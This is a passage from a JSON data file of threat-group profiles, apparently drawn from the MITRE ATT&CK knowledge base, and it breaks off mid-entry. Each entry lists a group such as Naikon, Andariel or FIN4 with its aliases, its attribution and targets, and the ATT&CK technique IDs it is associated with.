"attack_id": "G0019", "aliases": ["Naikon"], "description": "Naikon is assessed to be a state-sponsored cyber espionage group attributed to the Chinese People’s Liberation Army’s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020). Active since at least 2010, Naikon has primarily conducted operations against government, military, and civil organizations in Southeast Asia, as well as against international bodies such as the United Nations Development Programme (UNDP) and the Association of Southeast Asian Nations (ASEAN). While Naikon shares some characteristics with APT30, the two groups do not appear to be exact matches.", "top_techniques": [{"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1036.004", "name": "Masquerade Task or Service"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1046", "name": "Network Service Discovery"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1078.002", "name": "Domain Accounts"}, {"id": "T1137.006", "name": "Add-ins"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1518.001", "name": "Security Software Discovery"}, {"id": "T1547.001", "name": "Registry Run Keys / Startup Folder"}]}, {"name": "Silent Librarian", "attack_id": "G0122", "aliases": ["Silent Librarian", "TA407", "COBALT DICKENS"], "description": "Silent Librarian is a group that has targeted research and proprietary data at universities, government agencies, and private sector companies worldwide since at least 2013. Members of Silent Librarian are known to have been affiliated with the Iran-based Mabna Institute which has conducted cyber intrusions at the behest of the government of Iran, specifically the Islamic Revolutionary Guard Corps (IRGC).", "top_techniques": [{"id": "T1078", "name": "Valid Accounts"}, {"id": "T1110.003", "name": "Password Spraying"}, {"id": "T1114", "name": "Email Collection"}, {"id": "T1114.003", "name": "Email Forwarding Rule"}, {"id": "T1583.001", "name": "Domains"}, {"id": "T1585.002", "name": "Email Accounts"}, {"id": "T1588.002", "name": "Tool"}, {"id": "T1588.004", "name": "Digital Certificates"}, {"id": "T1589.002", "name": "Email Addresses"}, {"id": "T1589.003", "name": "Employee Names"}, {"id": "T1594", "name": "Search Victim-Owned Websites"}, {"id": "T1598.003", "name": "Spearphishing Link"}]}, {"name": "admin@338", "attack_id": "G0018", "aliases": ["admin@338"], "description": "admin@338 is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as PoisonIvy, as well as some non-public backdoors.", "top_techniques": [{"id": "T1007", "name": "System Service Discovery"}, {"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1049", "name": "System Network Connections Discovery"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1069.001", "name": "Local Groups"}, {"id": "T1082", "name": "System Information Discovery"}, {"id": "T1083", "name": "File and Directory Discovery"}, {"id": "T1087.001", "name": "Local Account"}, {"id": "T1203", "name": "Exploitation for Client Execution"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}]}, {"name": "Malteiro", "attack_id": "G1026", "aliases": ["Malteiro"], "description": "Malteiro is a financially motivated criminal group that is likely based in Brazil and has been active since at least November 2019. The group operates and distributes the Mispadu banking trojan via a Malware-as-a-Service (MaaS) business model. Malteiro mainly targets victims throughout Latin America (particularly Mexico) and Europe (particularly Spain and Portugal).", "top_techniques": [{"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1055.001", "name": "Dynamic-link Library Injection"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1082", "name": "System Information Discovery"}, {"id": "T1140", "name": "Deobfuscate/Decode Files or Information"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1518.001", "name": "Security Software Discovery"}, {"id": "T1555", "name": "Credentials from Password Stores"}, {"id": "T1555.003", "name": "Credentials from Web Browsers"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1614.001", "name": "System Language Discovery"}, {"id": "T1657", "name": "Financial Theft"}]}, {"name": "Andariel", "attack_id": "G0138", "aliases": ["Andariel", "Silent Chollima", "PLUTONIUM", "Onyx Sleet"], "description": "Andariel is a North Korean state-sponsored threat group that has been active since at least 2009. Andariel has primarily focused its operations--which have included destructive attacks--against South Korean government agencies, military organizations, and a variety of domestic companies; they have also conducted cyber financial operations against ATMs, banks, and cryptocurrency exchanges. Andariel's notable activity includes Operation Black Mine, Operation GoldenAxe, and Campaign Rifle. Andariel is considered a sub-set of Lazarus Group, and has been attributed to North Korea's Reconnaissance General Bureau. North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.", "top_techniques": [{"id": "T1005", "name": "Data from Local System"}, {"id": "T1027.003", "name": "Steganography"}, {"id": "T1049", "name": "System Network Connections Discovery"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1189", "name": "Drive-by Compromise"}, {"id": "T1203", "name": "Exploitation for Client Execution"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1588.001", "name": "Malware"}, {"id": "T1590.005", "name": "IP Addresses"}, {"id": "T1592.002", "name": "Software"}]}, {"name": "Mustard Tempest", "attack_id": "G1020", "aliases": ["Mustard Tempest", "DEV-0206", "TA569", "GOLD PRELUDE", "UNC1543"], "description": "Mustard Tempest is an initial access broker that has operated the SocGholish distribution network since at least 2017. Mustard Tempest has partnered with Indrik Spider to provide access for the download of additional malware including LockBit, WastedLocker, and remote access tools.", "top_techniques": [{"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1082", "name": "System Information Discovery"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1189", "name": "Drive-by Compromise"}, {"id": "T1204.001", "name": "Malicious Link"}, {"id": "T1566.002", "name": "Spearphishing Link"}, {"id": "T1583.004", "name": "Server"}, {"id": "T1583.008", "name": "Malvertising"}, {"id": "T1584.001", "name": "Domains"}, {"id": "T1608.001", "name": "Upload Malware"}, {"id": "T1608.004", "name": "Drive-by Target"}, {"id": "T1608.006", "name": "SEO Poisoning"}]}, {"name": "Moses Staff", "attack_id": "G1009", "aliases": ["Moses Staff", "DEV-0500", "Marigold Sandstorm"], "description": "Moses Staff is a suspected Iranian threat group that has primarily targeted Israeli companies since at least September 2021. Moses Staff openly stated their motivation in attacking Israeli companies is to cause damage by leaking stolen sensitive data and encrypting the victim's networks without a ransom demand. Security researchers assess Moses Staff is politically motivated, and has targeted government, finance, travel, energy, manufacturing, and utility companies outside of Israel as well, including those in Italy, India, Germany, Chile, Turkey, the UAE, and the US.", "top_techniques": [{"id": "T1016", "name": "System Network Configuration Discovery"}, {"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1082", "name": "System Information Discovery"}, {"id": "T1087.001", "name": "Local Account"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1190", "name": "Exploit Public-Facing Application"}, {"id": "T1505.003", "name": "Web Shell"}, {"id": "T1553.002", "name": "Code Signing"}, {"id": "T1587.001", "name": "Malware"}, {"id": "T1588.002", "name": "Tool"}, {"id": "T1686.003", "name": "Windows Host Firewall"}]}, {"name": "FIN4", "attack_id": "G0085", "aliases": ["FIN4"], "description": "FIN4 is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013. FIN4 is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.", "top_techniques": [{"id": "T1056.001", "name": "Keylogging"}, {"id": "T1056.002", "name": "GUI Input Capture"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1078", "name": "Valid Accounts"}, {"id": "T1090.003", "name": "Multi-hop Proxy"}, {"id": "T1114.002", "name": "Remote Email Collection"}, {"id": "T1204.001", "name": "Malicious Link"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1564.008", "name": "Email Hiding Rules"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1566.002", "name": "Spearphishing Link"}]}, {"name": "Dark Caracal", "attack_id": "G0070", "aliases": ["Dark Caracal"], "description": "Dark Caracal is threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012.", "top_techniques": [{"id": "T1005", "name": "Data from Local System"}, {"id": "T1027.002", "name": "Software Packing"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1083", "name": "File and Directory Discovery"}, {"id": "T1113", "name": "Screen Capture"}, {"id": "T1189", "name": "Drive-by Compromise"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1218.001", "name": "Compiled HTML File"}, {"id": "T1547.001", "name": "Registry Run Keys / Startup Folder"}, {"id": "T1566.003", "name": "Spearphishing via Service"}]}, {"name": "APT18", "attack_id": "G0026", "aliases": ["APT18", "TG-0416", "Dynamite Panda", "Threat Group-0416"], "description": "APT18 is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical.", "top_techniques": [{"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1053.002", "name": "At"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1070.004", "name": "File Deletion"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1071.004", "name": "DNS"}, {"id": "T1078", "name": "Valid Accounts"}, {"id": "T1082", "name": "System Information Discovery"}, {"id": "T1083", "name": "File and Directory Discovery"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1133", "name": "External Remote Services"}, {"id": "T1547.001", "name": "Registry Run Keys / Startup Folder"}]}, {"name": "PLATINUM", "attack_id": "G0068", "aliases": ["PLATINUM"], "description": "PLATINUM is an activity group that has targeted victims since at least 2009. The group has focused on targets associated with governments and related organizations in South and Southeast Asia.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1036", "name": "Masquerading"}, {"id": "T1055", "name": "Process Injection"}, {"id": "T1056.001", "name": "Keylogging"}, {"id": "T1056.004", "name": "Credential API Hooking"}, {"id": "T1068", "name": "Exploitation for Privilege Escalation"}, {"id": "T1095", "name": "Non-Application Layer Protocol"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1189", "name": "Drive-by Compromise"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}]}, {"name": "FIN10", "attack_id": "G0051", "aliases": ["FIN10"], "description": "FIN10 is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations.", "top_techniques": [{"id": "T1021.001", "name": "Remote Desktop Protocol"}, {"id": "T1033", "name": "System Owner/User Discovery"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1070.004", "name": "File Deletion"}, {"id": "T1078", "name": "Valid Accounts"}, {"id": "T1078.003", "name": "Local Accounts"}, {"id": "T1547.001", "name": "Registry Run Keys / Startup Folder"}, {"id": "T1570", "name": "Lateral Tool Transfer"}, {"id": "T1588.002", "name": "Tool"}]}, {"name": "Machete", "attack_id": "G0095", "aliases": ["Machete", "APT-C-43", "El Machete"], "description": "Machete is a suspected Spanish-speaking cyber espionage group that has been active since at least 2010. It has primarily focused its operations within Latin America, with a particular emphasis on Venezuela, but also in the US, Europe, Russia, and parts of Asia. Machete generally targets high-profile organizations such as government institutions, intelligence services, and military units, as well as telecommunications and power companies.", "top_techniques": [{"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1059.006", "name": "Python"}, {"id": "T1189", "name": "Drive-by Compromise"}, {"id": "T1204.001", "name": "Malicious Link"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1218.007", "name": "Msiexec"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1566.002", "name": "Spearphishing Link"}]}, {"name": "FIN5", "attack_id": "G0053", "aliases": ["FIN5"], "description": "FIN5 is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian.", "top_techniques": [{"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1059", "name": "Command and Scripting Interpreter"}, {"id": "T1070.004", "name": "File Deletion"}, {"id": "T1074.001", "name": "Local Data Staging"}, {"id": "T1078", "name": "Valid Accounts"}, {"id": "T1090.002", "name": "External Proxy"}, {"id": "T1110", "name": "Brute Force"}, {"id": "T1119", "name": "Automated Collection"}, {"id": "T1133", "name": "External Remote Services"}, {"id": "T1588.002", "name": "Tool"}, {"id": "T1685.005", "name": "Clear Windows Event Logs"}]}, {"name": "Evilnum", "attack_id": "G0120", "aliases": ["Evilnum"], "description": "Evilnum is a financially motivated threat group that has been active since at least 2018.", "top_techniques": [{"id": "T1059.007", "name": "JavaScript"}, {"id": "T1070.004", "name": "File Deletion"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1204.001", "name": "Malicious Link"}, {"id": "T1219.002", "name": "Remote Desktop Software"}, {"id": "T1497.001", "name": "System Checks"}, {"id": "T1539", "name": "Steal Web Session Cookie"}, {"id": "T1548.002", "name": "Bypass User Account Control"}, {"id": "T1555", "name": "Credentials from Password Stores"}, {"id": "T1566.002", "name": "Spearphishing Link"}, {"id": "T1574.001", "name": "DLL"}]}, {"name": "PROMETHIUM", "attack_id": "G0056", "aliases": ["PROMETHIUM", "StrongPity"], "description": "PROMETHIUM is an activity group focused on espionage that has been active since at least 2012. The group has conducted operations globally with a heavy emphasis on Turkish targets. PROMETHIUM has demonstrated similarity to another activity group called NEODYMIUM due to overlapping victim and campaign characteristics.", "top_techniques": [{"id": "T1036.004", "name": "Masquerade Task or Service"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1078.003", "name": "Local Accounts"}, {"id": "T1189", "name": "Drive-by Compromise"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1205.001", "name": "Port Knocking"}, {"id": "T1543.003", "name": "Windows Service"}, {"id": "T1547.001", "name": "Registry Run Keys / Startup Folder"}, {"id": "T1553.002", "name": "Code Signing"}, {"id": "T1587.002", "name": "Code Signing Certificates"}, {"id": "T1587.003", "name": "Digital Certificates"}]}, {"name": "DarkVishnya", "attack_id": "G0105", "aliases": ["DarkVishnya"], "description": "DarkVishnya is a financially motivated threat actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region.", "top_techniques": [{"id": "T1040", "name": "Network Sniffing"}, {"id": "T1046", "name": "Network Service Discovery"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1110", "name": "Brute Force"}, {"id": "T1135", "name": "Network Share Discovery"}, {"id": "T1200", "name": "Hardware Additions"}, {"id": "T1219", "name": "Remote Access Tools"}, {"id": "T1543.003", "name": "Windows Service"}, {"id": "T1571", "name": "Non-Standard Port"}, {"id": "T1588.002", "name": "Tool"}]}, {"name": "Deep Panda", "attack_id": "G0009", "aliases": ["Deep Panda", "Shell Crew", "WebMasters", "KungFu Kittens", "PinkPanther", "Black Vine"], "description": "Deep Panda is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications. The intrusion into healthcare company Anthem has been attributed to Deep Panda. This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther. Deep Panda also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion. Some analysts track Deep Panda and APT19 as the same group, but it is unclear from open source information if the groups are the same.", "top_techniques": [{"id": "T1018", "name": "Remote System Discovery"}, {"id": "T1021.002", "name": "SMB/Windows Admin Shares"}, {"id": "T1027.005", "name": "Indicator Removal from Tools"}, {"id": "T1047", "name": "Windows Management Instrumentation"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1218.010", "name": "Regsvr32"}, {"id": "T1505.003", "name": "Web Shell"}, {"id": "T1546.008", "name": "Accessibility Features"}, {"id": "T1564.003", "name": "Hidden Window"}]}, {"name": "Elderwood", "attack_id": "G0066", "aliases": ["Elderwood", "Elderwood Gang", "Beijing Group", "Sneaky Panda"], "description": "Elderwood is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora. The group has targeted defense organizations, supply chain manufacturers, human rights and nongovernmental organizations (NGOs), and IT service providers.", "top_techniques": [{"id": "T1027.002", "name": "Software Packing"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1189", "name": "Drive-by Compromise"}, {"id": "T1203", "name": "Exploitation for Client Execution"}, {"id": "T1204.001", "name": "Malicious Link"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1566.002", "name": "Spearphishing Link"}]}, {"name": "Aoqin Dragon", "attack_id": "G1007", "aliases": ["Aoqin Dragon"], "description": "Aoqin Dragon is a suspected Chinese cyber espionage threat group that has been active since at least 2013. Aoqin Dragon has primarily targeted government, education, and telecommunication organizations in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Security researchers noted a potential association between Aoqin Dragon and UNC94, based on malware, infrastructure, and targets.", "top_techniques": [{"id": "T1027.002", "name": "Software Packing"}, {"id": "T1036", "name": "Masquerading"}, {"id": "T1083", "name": "File and Directory Discovery"}, {"id": "T1091", "name": "Replication Through Removable Media"}, {"id": "T1203", "name": "Exploitation for Client Execution"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1570", "name": "Lateral Tool Transfer"}, {"id": "T1587.001", "name": "Malware"}, {"id": "T1588.002", "name": "Tool"}]}, {"name": "Rancor", "attack_id": "G0075", "aliases": ["Rancor"], "description": "Rancor is a threat group that has led targeted campaigns against the South East Asia region. Rancor uses politically-motivated lures to entice victims to open malicious documents.", "top_techniques": [{"id": "T1053.005", "name": "Scheduled Task"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1059.005", "name": "Visual Basic"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1218.007", "name": "Msiexec"}, {"id": "T1546.003", "name": "Windows Management Instrumentation Event Subscription"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}]}, {"name": "Metador", "attack_id": "G1013", "aliases": ["Metador"], "description": "Metador is a suspected cyber espionage group that was first reported in September 2022. Metador has targeted a limited number of telecommunication companies, internet service providers, and universities in the Middle East and Africa. Security researchers named the group Metador based on the \"I am meta\" string in one of the group's malware samples and the expectation of Spanish-language responses from C2 servers.", "top_techniques": [{"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1070.004", "name": "File Deletion"}, {"id": "T1071.001", "name": "Web Protocols"}, {"id": "T1095", "name": "Non-Application Layer Protocol"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1546.003", "name": "Windows Management Instrumentation Event Subscription"}, {"id": "T1588.001", "name": "Malware"}, {"id": "T1588.002", "name": "Tool"}]}, {"name": "Sowbug", "attack_id": "G0054", "aliases": ["Sowbug"], "description": "Sowbug is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia, particularly government entities, since at least 2015.", "top_techniques": [{"id": "T1003", "name": "OS Credential Dumping"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1039", "name": "Data from Network Shared Drive"}, {"id": "T1056.001", "name": "Keylogging"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1082", "name": "System Information Discovery"}, {"id": "T1083", "name": "File and Directory Discovery"}, {"id": "T1135", "name": "Network Share Discovery"}, {"id": "T1560.001", "name": "Archive via Utility"}]}, {"name": "Whitefly", "attack_id": "G0107", "aliases": ["Whitefly"], "description": "Whitefly is a cyber espionage group that has been operating since at least 2017. The group has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information. The group has been linked to an attack against Singapore’s largest public health organization, SingHealth.", "top_techniques": [{"id": "T1003.001", "name": "LSASS Memory"}, {"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1059", "name": "Command and Scripting Interpreter"}, {"id": "T1068", "name": "Exploitation for Privilege Escalation"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1574.001", "name": "DLL"}, {"id": "T1588.002", "name": "Tool"}]}, {"name": "Poseidon Group", "attack_id": "G0033", "aliases": ["Poseidon Group"], "description": "Poseidon Group is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the Poseidon Group as a security firm.", "top_techniques": [{"id": "T1003", "name": "OS Credential Dumping"}, {"id": "T1007", "name": "System Service Discovery"}, {"id": "T1036.005", "name": "Match Legitimate Resource Name or Location"}, {"id": "T1049", "name": "System Network Connections Discovery"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1087.001", "name": "Local Account"}, {"id": "T1087.002", "name": "Domain Account"}]}, {"name": "MoustachedBouncer", "attack_id": "G1019", "aliases": ["MoustachedBouncer"], "description": "MoustachedBouncer is a cyberespionage group that has been active since at least 2014 targeting foreign embassies in Belarus.", "top_techniques": [{"id": "T1027.002", "name": "Software Packing"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.007", "name": "JavaScript"}, {"id": "T1068", "name": "Exploitation for Privilege Escalation"}, {"id": "T1074.002", "name": "Remote Data Staging"}, {"id": "T1090", "name": "Proxy"}, {"id": "T1113", "name": "Screen Capture"}, {"id": "T1659", "name": "Content Injection"}]}, {"name": "CopyKittens", "attack_id": "G0052", "aliases": ["CopyKittens"], "description": "CopyKittens is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip.", "top_techniques": [{"id": "T1059.001", "name": "PowerShell"}, {"id": "T1090", "name": "Proxy"}, {"id": "T1218.011", "name": "Rundll32"}, {"id": "T1553.002", "name": "Code Signing"}, {"id": "T1560.001", "name": "Archive via Utility"}, {"id": "T1560.003", "name": "Archive via Custom Method"}, {"id": "T1564.003", "name": "Hidden Window"}, {"id": "T1588.002", "name": "Tool"}]}, {"name": "POLONIUM", "attack_id": "G1005", "aliases": ["POLONIUM", "Plaid Rain"], "description": "POLONIUM is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess POLONIUM has coordinated their operations with multiple actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling.", "top_techniques": [{"id": "T1078", "name": "Valid Accounts"}, {"id": "T1090", "name": "Proxy"}, {"id": "T1102.002", "name": "Bidirectional Communication"}, {"id": "T1199", "name": "Trusted Relationship"}, {"id": "T1567.002", "name": "Exfiltration to Cloud Storage"}, {"id": "T1583.006", "name": "Web Services"}, {"id": "T1588.002", "name": "Tool"}]}, {"name": "RTM", "attack_id": "G0048", "aliases": ["RTM"], "description": "RTM is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name (RTM).", "top_techniques": [{"id": "T1102.001", "name": "Dead Drop Resolver"}, {"id": "T1189", "name": "Drive-by Compromise"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1219.002", "name": "Remote Desktop Software"}, {"id": "T1547.001", "name": "Registry Run Keys / Startup Folder"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1574.001", "name": "DLL"}]}, {"name": "Windigo", "attack_id": "G0124", "aliases": ["Windigo"], "description": "The Windigo group has been operating since at least 2011, compromising thousands of Linux and Unix servers using the Ebury SSH backdoor to create a spam botnet. Despite law enforcement intervention against the creators, Windigo operators continued updating Ebury through 2019.", "top_techniques": [{"id": "T1005", "name": "Data from Local System"}, {"id": "T1059", "name": "Command and Scripting Interpreter"}, {"id": "T1082", "name": "System Information Discovery"}, {"id": "T1083", "name": "File and Directory Discovery"}, {"id": "T1090", "name": "Proxy"}, {"id": "T1189", "name": "Drive-by Compromise"}, {"id": "T1518", "name": "Software Discovery"}]}, {"name": "Nomadic Octopus", "attack_id": "G0133", "aliases": ["Nomadic Octopus", "DustSquad"], "description": "Nomadic Octopus is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. Nomadic Octopus has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.", "top_techniques": [{"id": "T1036", "name": "Masquerading"}, {"id": "T1059.001", "name": "PowerShell"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1564.003", "name": "Hidden Window"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}]}, {"name": "DarkHydrus", "attack_id": "G0079", "aliases": ["DarkHydrus"], "description": "DarkHydrus is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks.", "top_techniques": [{"id": "T1059.001", "name": "PowerShell"}, {"id": "T1187", "name": "Forced Authentication"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1221", "name": "Template Injection"}, {"id": "T1564.003", "name": "Hidden Window"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1588.002", "name": "Tool"}]}, {"name": "The White Company", "attack_id": "G0089", "aliases": ["The White Company"], "description": "The White Company is a likely state-sponsored threat actor with advanced capabilities. From 2017 through 2018, the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan.", "top_techniques": [{"id": "T1027.002", "name": "Software Packing"}, {"id": "T1070.004", "name": "File Deletion"}, {"id": "T1124", "name": "System Time Discovery"}, {"id": "T1203", "name": "Exploitation for Client Execution"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1518.001", "name": "Security Software Discovery"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}]}, {"name": "IndigoZebra", "attack_id": "G0136", "aliases": ["IndigoZebra"], "description": "IndigoZebra is a suspected Chinese cyber espionage group that has been targeting Central Asian governments since at least 2014.", "top_techniques": [{"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1583.001", "name": "Domains"}, {"id": "T1583.006", "name": "Web Services"}, {"id": "T1586.002", "name": "Email Accounts"}, {"id": "T1588.002", "name": "Tool"}]}, {"name": "TA577", "attack_id": "G1037", "aliases": ["TA577"], "description": "TA577 is an initial access broker (IAB) that has distributed QakBot and Pikabot, and was among the first observed groups distributing Latrodectus in 2023.", "top_techniques": [{"id": "T1027.009", "name": "Embedded Payloads"}, {"id": "T1059.003", "name": "Windows Command Shell"}, {"id": "T1059.007", "name": "JavaScript"}, {"id": "T1204.001", "name": "Malicious Link"}, {"id": "T1566.002", "name": "Spearphishing Link"}, {"id": "T1586.002", "name": "Email Accounts"}]}, {"name": "Ajax Security Team", "attack_id": "G0130", "aliases": ["Ajax Security Team", "Operation Woolen-Goldfish", "AjaxTM", "Rocket Kitten", "Flying Kitten", "Operation Saffron Rose"], "description": "Ajax Security Team is a group that has been active since at least 2010 and believed to be operating out of Iran. By 2014 Ajax Security Team transitioned from website defacement operations to malware-based cyber espionage campaigns targeting the US defense industrial base and Iranian users of anti-censorship technologies.", "top_techniques": [{"id": "T1056.001", "name": "Keylogging"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1555.003", "name": "Credentials from Web Browsers"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1566.003", "name": "Spearphishing via Service"}]}, {"name": "Winnti Group", "attack_id": "G0044", "aliases": ["Winnti Group", "Blackfly"], "description": "Winnti Group is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting. Some reporting suggests a number of other groups, including Axiom, APT17, and Ke3chang, are closely linked to Winnti Group.", "top_techniques": [{"id": "T1014", "name": "Rootkit"}, {"id": "T1057", "name": "Process Discovery"}, {"id": "T1083", "name": "File and Directory Discovery"}, {"id": "T1105", "name": "Ingress Tool Transfer"}, {"id": "T1553.002", "name": "Code Signing"}, {"id": "T1583.001", "name": "Domains"}]}, {"name": "Mofang", "attack_id": "G0103", "aliases": ["Mofang"], "description": "Mofang is a likely China-based cyber espionage group, named for its frequent practice of imitating a victim's infrastructure. This adversary has been observed since at least May 2012 conducting focused attacks against government and critical infrastructure in Myanmar, as well as several other countries and sectors including military, automobile, and weapons industries.", "top_techniques": [{"id": "T1027.013", "name": "Encrypted/Encoded File"}, {"id": "T1027.015", "name": "Compression"}, {"id": "T1204.001", "name": "Malicious Link"}, {"id": "T1204.002", "name": "Malicious File"}, {"id": "T1566.001", "name": "Spearphishing Attachment"}, {"id": "T1566.002", "name": "Spearphishing Link"}]}, {"name": "Gallmaker", "attack_id": "G0084", "aliases": ["Gallmaker"], "description": "Gallmaker is a cyberespionage group that has 